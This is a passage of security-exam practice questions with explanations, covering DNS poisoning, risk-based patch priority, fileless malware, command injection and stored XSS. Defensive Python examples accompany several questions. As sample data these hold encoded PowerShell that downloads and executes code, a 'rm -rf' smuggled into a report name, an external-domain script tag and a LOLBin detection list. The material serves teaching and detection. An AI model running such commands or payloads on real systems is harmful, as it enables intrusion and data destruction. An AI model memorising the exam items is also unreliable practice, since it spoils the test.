A.ARP spoofing, because the attacker is changing the MAC address used on the local network.
B.DNS poisoning, because the attacker has corrupted name resolution so users are sent to a malicious destination.
C.Port scanning, because the attacker is probing internal services for open ports.
D.Denial-of-service, because the attacker is overwhelming the portal with traffic.
AnswerB
DNS poisoning fits the evidence because the resolver cache contains bad entries and users are being directed to a fake site through altered name resolution. That lets the attacker redirect traffic without changing the user’s bookmarks or typing habits.
Why this answer
B is correct because DNS poisoning (also known as DNS cache poisoning) directly corrupts the name resolution process, causing the finance portal's hostname to resolve to a malicious IP address. The presence of unexpected DNS resolver cache entries for that hostname confirms that the attack targeted the DNS infrastructure, not the ARP table or network availability.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic, but ARP spoofing operates at Layer 2 and does not affect DNS resolver cache entries, whereas DNS poisoning directly corrupts the name resolution database.
How to eliminate wrong answers
Option A is wrong because ARP spoofing manipulates MAC-to-IP mappings at Layer 2, not DNS cache entries; it would cause traffic interception on the local subnet but would not explain unexpected DNS resolver cache entries. Option C is wrong because port scanning is a reconnaissance technique used to discover open ports and services, not a method to redirect users to a fake login page or corrupt DNS records. Option D is wrong because a denial-of-service attack aims to overwhelm a service with traffic to make it unavailable, not to alter DNS resolution or present a fake login page.
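A check that turns the evidence in this question (unexpected entries in the resolver cache) into a repeatable test, as an added example that is not part of the page. The cache dump format, the hostnames, and the baseline networks are all constructed assumptions; real resolvers dump their cache in their own formats, so only the parser would change.

```python
"""Flag resolver-cache A records that fall outside the known-good baseline.

Added example, not from the page. Cache lines are constructed in a simplified
"<name> <ttl> IN A <ip>" form; names, IPs and baseline networks are assumptions.
"""
import ipaddress

# Assumed baseline: the networks each monitored internal name may resolve into
BASELINE = {
    "finance.corp.example": [ipaddress.ip_network("10.20.0.0/24")],
    "intranet.corp.example": [ipaddress.ip_network("10.20.1.0/24")],
}

# Constructed cache dump: the first finance entry is the poisoned one
CACHE_DUMP = """\
finance.corp.example 3600 IN A 198.51.100.23
finance.corp.example 120 IN A 10.20.0.15
intranet.corp.example 3600 IN A 10.20.1.8
www.example.net 300 IN A 203.0.113.4
"""


def parse_cache(dump: str):
    """Yield (name, ttl, ip) for each A record line; other record types are skipped."""
    for line in dump.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[2:4] == ["IN", "A"]:
            yield parts[0].lower().rstrip("."), int(parts[1]), ipaddress.ip_address(parts[4])


def suspicious_entries(dump: str, baseline=BASELINE) -> list[tuple[str, str, int]]:
    """Return (name, ip, ttl) for monitored names resolving outside their baseline."""
    bad = []
    for name, ttl, ip in parse_cache(dump):
        allowed = baseline.get(name)
        if allowed is None:
            continue  # not a monitored internal name
        if not any(ip in net for net in allowed):
            bad.append((name, str(ip), ttl))
    return bad


if __name__ == "__main__":
    for entry in suspicious_entries(CACHE_DUMP):
        print("poisoned?", entry)
```

The TTL is kept in the result because injected records often carry a long TTL so the bogus answer survives in the cache; an ARP spoofing incident would leave this output empty, since the name-to-IP mapping would still be correct and only the MAC mapping would be wrong.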
A vulnerability scan finds two issues: a critical deserialization flaw on a non-production lab server behind a VPN, and a high-severity privilege escalation flaw on the production jump server that administrators use to reach the rest of the environment. Which should be remediated first?
A.The lab server flaw, because critical severity always comes first
B.The jump server flaw, because it affects a production administrative access point
C.Neither issue, because VPN access reduces the need for urgent remediation
D.The lab server flaw, because non-production systems are always easier to patch later
AnswerB
A vulnerable jump server can provide broad access to the environment, so its risk is higher despite the lower severity label.
Why this answer
The jump server flaw must be remediated first because it is a high-severity privilege escalation vulnerability on a production system that administrators use as a gateway to the entire environment. Compromise of this jump server would give an attacker administrative access to all connected production systems, making the business impact far greater than the critical deserialization flaw on an isolated non-production lab server. In risk-based prioritization, severity alone is insufficient; the asset's role, exposure, and potential blast radius must be considered.
Exam trap
The trap here is that candidates fixate on CVSS severity scores (critical vs. high) without considering the asset's context, such as whether it is a production system, its role in the network architecture, and the potential for lateral movement, which CompTIA emphasizes in risk management and prioritization scenarios.
How to eliminate wrong answers
Option A is wrong because it incorrectly assumes that CVSS critical severity always dictates remediation priority, ignoring that the lab server is non-production, isolated behind a VPN, and does not handle sensitive data or provide access to production systems. Option C is wrong because VPN access does not eliminate the risk of compromise; an attacker who gains access to the VPN (e.g., via stolen credentials or a client-side exploit) could still reach the jump server, and the jump server's privilege escalation flaw would then allow lateral movement to all production assets. Option D is wrong because it suggests deferring remediation on non-production systems, but the critical deserialization flaw on the lab server could still be exploited if an attacker reaches it (e.g., via VPN or insider threat), and patching it is typically easier and lower risk than patching production systems, so it should be remediated promptly but not before the higher-impact production jump server flaw.
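The prioritization argument in this question and in the earlier VPN/workstation/test-server question can be made mechanical. The scoring below is an added example, not a standard or anything from the page: the weights are illustrative assumptions, and the two finding sets are constructed from the question text. What it shows is that exposure, exploit availability, required access, compensating controls, and the asset's role move a finding above or below its raw severity label.

```python
"""Context-weighted ranking of vulnerability findings (added example).

Weights are assumptions chosen to illustrate risk-based prioritization; they
are not CVSS and not from the page. Findings are constructed from the two
scan questions above.
"""
from dataclasses import dataclass

SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}
ROLE_WEIGHT = {"production-admin": 2.0, "production": 1.2, "test": 0.4}  # assumed blast radius


@dataclass
class Finding:
    name: str
    severity: str
    internet_facing: bool
    exploit_public: bool
    requires_local_auth: bool
    compensating_controls: bool
    asset_role: str


def risk_score(f: Finding) -> float:
    """Severity scaled by exposure, exploitability, existing mitigations and asset role."""
    score = float(SEVERITY[f.severity])
    score *= 2.0 if f.internet_facing else 1.0        # reachable by anyone on the internet
    score *= 1.5 if f.exploit_public else 1.0         # exploit code already available
    score *= 0.5 if f.requires_local_auth else 1.0    # attacker needs a foothold first
    score *= 0.6 if f.compensating_controls else 1.0  # mitigation buys time
    score *= ROLE_WEIGHT[f.asset_role]
    return round(score, 2)


def prioritize(findings: list[Finding]) -> list[Finding]:
    """Highest contextual risk first."""
    return sorted(findings, key=risk_score, reverse=True)


# Constructed from the VPN / dev workstation / test server question
SCAN_ONE = [
    Finding("VPN appliance", "high", True, True, False, False, "production"),
    Finding("Dev workstation", "critical", False, False, True, False, "production"),
    Finding("Test server", "medium", False, False, False, False, "test"),
]

# Constructed from the jump server / lab server question; "behind a VPN" is
# treated as a compensating control, and privilege escalation as local access.
SCAN_TWO = [
    Finding("Lab server deserialization", "critical", False, False, False, True, "test"),
    Finding("Jump server privesc", "high", False, False, True, False, "production-admin"),
]

if __name__ == "__main__":
    for scan in (SCAN_ONE, SCAN_TWO):
        for f in prioritize(scan):
            print(f"{risk_score(f):6.2f}  {f.severity:8}  {f.name}")
        print()
```

With these weights the high-severity VPN appliance outranks the critical workstation by a wide margin, and the jump server outranks the lab server; change the weights and the ordering of close calls will shift, which is why the inputs to the score, not the severity label, are what a reviewer should argue about.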
A SOC analyst sees repeated encoded PowerShell launched by mshta.exe. No new executable is written to disk, but the host makes periodic outbound connections to the same IP. Which malware characteristic is most likely?
A.Fileless attack, because the malicious activity lives in memory and uses built-in tools.
B.Worm, because the host is making outbound connections to a remote system.
C.Spyware, because the host is communicating with an external IP address.
D.Rootkit, because the system tools are being hidden from the user.
AnswerA
Fileless attacks commonly abuse legitimate system utilities and leave little or no executable on disk. The use of PowerShell and mshta.exe strongly suggests living-off-the-land behavior designed to evade basic file-based detection.
Why this answer
The scenario describes encoded PowerShell commands executed by mshta.exe without writing a new executable to disk, which is a classic fileless attack technique. Fileless malware operates entirely in memory, leveraging legitimate system tools (like PowerShell and mshta) to evade traditional antivirus detection, and the outbound connections are for command-and-control (C2) communication, not for self-propagation or data theft.
Exam trap
The trap here is that candidates see 'outbound connections' and immediately think of a worm or spyware, but the key differentiator is the lack of a written executable and the use of built-in tools in memory, which defines a fileless attack.
How to eliminate wrong answers
Option B is wrong because a worm self-propagates across networks without user interaction, but the description only shows outbound connections to a single IP, not scanning or spreading to other hosts. Option C is wrong because spyware specifically steals user data (e.g., keystrokes, files) and typically exfiltrates to a C2 server, but the question focuses on the execution method (memory-resident) and does not indicate data collection. Option D is wrong because a rootkit hides system objects (files, processes, registry keys) from the OS, but the scenario does not mention any concealment of tools or persistence mechanisms; it simply shows a process (mshta.exe) running PowerShell in memory.
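The three fileless and behavioral-detection questions above (the scheduled task that launches PowerShell and spawns rundll32, the "durable rule" question, and mshta launching encoded PowerShell) all come down to the same detection: match the process chain and the encoded payload rather than the IP or domain. The following is an added example, not code from the page; the event records are constructed to resemble process-creation telemetry and their field names are assumptions. One fact it relies on: PowerShell's -EncodedCommand argument is Base64 of the script text encoded as UTF-16LE, so decoding it is a two-step operation.

```python
"""Detect living-off-the-land chains and decode -EncodedCommand payloads.

Added example. EVENTS is constructed telemetry in a Sysmon-like shape
(pid, ppid, image, cmdline); field names and all hosts/IPs are assumptions.
"""
from __future__ import annotations

import base64
import re

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe"}
TASK_HOSTS = {"svchost.exe", "taskeng.exe"}  # processes that launch scheduled tasks

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(r"IEX|Invoke-Expression|DownloadString|irm |Invoke-RestMethod|WebClient", re.I)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the script behind -EncodedCommand: Base64 of UTF-16LE text."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of the above; used here only to build the sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events: two "waves" with different infrastructure, same chains,
# plus benign PowerShell started from Explorer that must not alert.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs -s Schedule"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')")},
    {"pid": 300, "ppid": 200, "image": "rundll32.exe", "cmdline": "rundll32.exe C:\\Windows\\Temp\\x.dll,Start"},
    {"pid": 400, "ppid": 50, "image": "mshta.exe", "cmdline": "mshta.exe http://198.51.100.7/l.hta"},
    {"pid": 500, "ppid": 400, "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + encode_command("Start-Sleep 30; IEX (irm 'http://198.51.100.7/s')")},
    {"pid": 600, "ppid": 60, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 700, "ppid": 600, "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]


def find_chains(events: list[dict]) -> list[tuple[int, str, list[str]]]:
    """Alert on a LOLBin launched by a task host or by another LOLBin, and on
    encoded commands that fetch and run code. Infrastructure is never consulted."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = e["image"].lower()
        if img not in LOLBINS:
            continue
        parent = by_pid.get(e["ppid"])
        pimg = parent["image"].lower() if parent else ""
        reasons = []
        if pimg in TASK_HOSTS:
            reasons.append(f"launched by task host {pimg}")
        if pimg in LOLBINS:
            reasons.append(f"spawned by {pimg}")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded and DOWNLOAD_EXEC.search(decoded):
            reasons.append("encoded command downloads and executes code")
        if reasons:
            alerts.append((e["pid"], img, reasons))
    return alerts


if __name__ == "__main__":
    for pid, img, reasons in find_chains(EVENTS):
        print(pid, img, "; ".join(reasons))
```

The rule fires on pids 200, 300 and 500 and stays silent on the backup script from Explorer. Because it keys on parent/child relationships and on what the decoded command does, the attacker rehosting to a new VPS tomorrow changes nothing about the matches.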
A report generator accepts a user-supplied report name and then passes it into a shell command to convert a file. During testing, a malicious value causes the server to run an unexpected system command. Which two changes best mitigate this issue while keeping the feature usable? Select two.
Select 2 answers
A.Replace shell command concatenation with a parameterized API or safe library call.
B.Apply strict server-side allowlist validation to the report name before processing.
C.HTML-encode the report name before inserting it into the shell command.
D.Switch the feature from POST to GET so the values are easier to inspect.
E.Hide the server error messages so attackers cannot see the failure details.
AnswersA, B
Avoiding direct shell invocation removes the attacker-controlled command injection path. A safe API or library call passes data as data instead of executable syntax. This is the most effective fix because it eliminates the dangerous pattern rather than trying to filter every possible payload.
Why this answer
Option A is correct because replacing shell command concatenation with a parameterized API or safe library call prevents command injection by ensuring user input is treated as data, not executable code. This is the most effective mitigation because it eliminates the injection vector entirely, rather than trying to sanitize or validate input that may still be passed to a shell interpreter. Option B is correct because a strict server-side allowlist (for example, only letters, digits, hyphens and underscores) rejects shell metacharacters such as ;, |, & and $( ) before the name reaches any command, and also blocks names such as a leading dash that the converter itself could interpret as an option.
Exam trap
The trap here is that candidates often choose HTML encoding (Option C) thinking it sanitizes all injection types, but HTML encoding only prevents XSS, not command injection, which requires shell-specific escaping or, better, avoiding shell invocation altogether.
How to eliminate wrong answers
Option C is wrong because HTML encoding targets browser rendering; characters such as ; and | are not HTML-special, so an encoded name would still be interpreted by the shell. Option D is wrong because changing the HTTP method does not alter how the server builds the command, and GET places user input in URLs, proxy logs and browser history. Option E is wrong because suppressing error messages hides the symptom from the tester while the injected command still runs.
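The vulnerable pattern beside its fix, as an added example that is not the page's code. Because the real converter is unknown, a Python one-liner stands in for it so the block runs anywhere; in a real application the argument list would name the converter binary (an assumption, e.g. `["libreoffice", "--convert-to", "pdf", path]`). The allowlist pattern is an assumed policy.

```python
"""Command injection: shell-string concatenation beside an argv list plus allowlist.

Added example, not from the page. The converter is replaced by a Python
one-liner that prints its argument, so the effect of passing input as data
is visible without any external tool.
"""
import re
import subprocess
import sys

# Assumed allowlist: letters, digits, underscore, hyphen; cannot start with '-'
REPORT_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")


def convert_vulnerable(report_name: str) -> str:
    """BEFORE: returns the string the original code would hand to shell=True.
    Anything after ';' or '|' in report_name becomes a second command."""
    return f"convert {report_name}.src {report_name}.pdf"


def stand_in_converter(arg: str) -> list[str]:
    """argv for the stand-in converter: prints exactly the argument it receives."""
    return [sys.executable, "-c", "import sys; print(sys.argv[1])", arg]


def build_command(report_name: str) -> list[str]:
    """AFTER: validate against the allowlist, then build an argv list."""
    if not REPORT_NAME.fullmatch(report_name):
        raise ValueError("report name rejected by allowlist")
    return stand_in_converter(f"{report_name}.src")


def convert(report_name: str) -> str:
    """Run the converter with no shell; the name is one argv element."""
    out = subprocess.run(build_command(report_name), capture_output=True, text=True, check=True)
    return out.stdout.strip()


def argv_is_data(hostile_name: str) -> str:
    """Show that even an unvalidated hostile name is inert when passed as argv
    (no shell parses it). Validation is still needed for option-like names."""
    out = subprocess.run(stand_in_converter(f"{hostile_name}.src"),
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def is_accepted(report_name: str) -> bool:
    try:
        build_command(report_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    hostile = "q1; rm -rf /tmp/x"
    print("shell string:", convert_vulnerable(hostile))
    print("as argv     :", argv_is_data(hostile))
    print("accepted?   :", is_accepted(hostile), is_accepted("q1_sales"))
```

The argv list alone stops the shell from ever seeing `;`, which is the Option A fix; the allowlist (Option B) is what stops a name like `-o` or `--exec=...` from being read as an option by the converter, a problem the list form does not solve on its own.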
A security analyst is investigating a series of alerts from the web application firewall. Users are reporting that when they view a product review page on the company's e-commerce site, their browser automatically redirects to a malicious website. The analyst examines the database and finds that a product review submitted by a user contains a <script> tag that loads a JavaScript file from an external domain. Which type of attack has occurred?
A.Cross-site request forgery (CSRF)
B.Stored cross-site scripting (XSS)
C.SQL injection
D.Reflected cross-site scripting (XSS)
AnswerB
The injected script is permanently stored in the database (in the product review) and executes when other users view the page, which is the defining characteristic of stored (persistent) XSS.
Why this answer
The attack is stored cross-site scripting (XSS) because the malicious <script> tag was permanently stored in the product review database. When any user views the product review page, the browser loads and executes the external JavaScript file from the attacker's domain, causing an automatic redirect to a malicious website. This matches the classic stored XSS pattern where payload persists in server-side storage and executes in the victim's browser context.
Exam trap
The trap here is confusing stored XSS with CSRF because both involve user interaction and redirects, but stored XSS is about injecting persistent client-side code, while CSRF forges requests without injecting scripts.
How to eliminate wrong answers
Option A is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a trusted site, not injecting client-side scripts that execute in the browser. Option C is wrong because SQL injection targets the database layer by manipulating SQL queries to extract or modify data, not by injecting HTML/JavaScript that executes in the user's browser. Option D is wrong because reflected XSS carries the payload in the request itself (for example, a URL parameter) and echoes it back only in that immediate response to whoever followed the crafted link; here the script persists in the database and runs for every visitor to the review page, which is stored XSS.
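Two pieces a practitioner would want next to this question, as an added example that is not the page's code: the rendering mistake that lets a stored review execute, beside output encoding that neutralizes it, and an audit helper of the kind the analyst used to find the review that loads script from an external domain. The reviews and the trusted host are constructed assumptions.

```python
"""Stored XSS: unsafe vs encoded rendering, plus a scan of stored reviews.

Added example, not from the page. STORED_REVIEWS is constructed; the trusted
host name is an assumption.
"""
import html
import re
from urllib.parse import urlparse

# Constructed contents of the product_review table
STORED_REVIEWS = [
    "Great blender, five stars.",
    '<script src="https://cdn.attacker.example/r.js"></script>',
    "Nice <b>but</b> loud",
]


def render_unsafe(review: str) -> str:
    """BEFORE: stored text is concatenated straight into the page markup."""
    return f"<div class='review'>{review}</div>"


def render_safe(review: str) -> str:
    """AFTER: HTML-entity encode on output so the browser treats it as text.
    html.escape is correct for HTML body context only; attribute, URL and
    JavaScript contexts need their own encoders."""
    return f"<div class='review'>{html.escape(review, quote=True)}</div>"


SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def external_script_sources(reviews, trusted_hosts=("shop.example",)):
    """Audit helper: (index, host) for stored reviews that pull script from
    a host outside the trusted list; what the analyst found in the database."""
    hits = []
    for i, r in enumerate(reviews):
        for src in SCRIPT_SRC.findall(r):
            host = urlparse(src).hostname or ""
            if host not in trusted_hosts:
                hits.append((i, host))
    return hits


if __name__ == "__main__":
    print(render_unsafe(STORED_REVIEWS[1]))
    print(render_safe(STORED_REVIEWS[1]))
    print(external_script_sources(STORED_REVIEWS))
```

Encoding on output is the fix that removes the browser's reason to execute the payload; a Content Security Policy that disallows scripts from unknown origins is the defence in depth that would have blocked the external load even with the encoding bug present.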